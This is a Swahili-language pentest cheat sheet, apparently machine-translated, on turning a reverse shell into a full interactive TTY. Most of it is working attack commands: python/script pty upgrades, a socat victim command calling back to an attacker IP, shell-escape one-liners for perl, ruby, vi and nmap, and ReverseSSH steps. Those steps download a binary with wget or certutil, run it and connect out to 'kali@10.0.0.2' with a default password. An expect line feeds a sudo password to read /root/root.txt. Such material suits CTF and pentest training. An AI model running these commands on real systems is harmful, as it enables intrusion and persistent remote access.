TTY Kamili

Tafadhali kumbuka kuwa kabati uliyoweka kwenye kivinjari cha SHELL lazima iwe imeorodheshwa ndani ya /etc/shells au Thamani ya kivinjari cha SHELL haikupatikana kwenye faili ya /etc/shells Tukio hili limeandikishwa. Pia, tafadhali kumbuka kuwa vipande vifuatavyo vinatumika tu kwenye bash. Ikiwa uko kwenye zsh, badilisha kwenye bash kabla ya kupata kabati kwa kukimbia bash.

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

script

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Kuzalisha maboya

• python -c 'import pty; pty.spawn("/bin/sh")'

• echo os.system('/bin/bash')

• /bin/sh -i

• script -qc /bin/bash /dev/null

• perl -e 'exec "/bin/sh";'

• perl: exec "/bin/sh";

• ruby: exec "/bin/sh"

• lua: os.execute('/bin/sh')

• IRB: exec "/bin/sh"

• vi: :!bash

• vi: :set shell=/bin/bash:shell

• nmap: !sh

ReverseSSH

Njia rahisi ya kupata upatikanaji wa maboya ya kuingiliana, pamoja na uhamishaji wa faili na mbelezo wa bandari, ni kuweka seva ya ssh iliyolinkishwa kwa njia ya kurudisha ReverseSSH kwenye lengo.

Hapa chini ni mfano kwa x86 na faili za binary zilizopunguzwa na upx. Kwa faili za binary nyingine, angalia ukurasa wa matoleo.

1. Jitayarisha kwenye kompyuta yako ili kupokea ombi la mbelezo la ssh:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444

• (2a) Lengo la Linux:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2

• (2b) Lengo la Windows 10 (kwa toleo za awali, angalia soma maelezo ya mradi):

# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2

• Ikiwa ombi la mbele ya SSH limefanikiwa, sasa unapaswa kuweza kuingia kwa nywila ya chaguo-msingi letmeinbrudipls katika muktadha wa mtumiaji anayetumia reverse-ssh(.exe):

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

Hakuna TTY

Ikiwa kwa sababu fulani huwezi kupata TTY kamili, bado unaweza kuingiliana na programu ambazo zinatarajia kuingiza mtumiaji. Katika mfano ufuatao, nenosiri linapitishwa kwa sudo ili kusoma faili:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'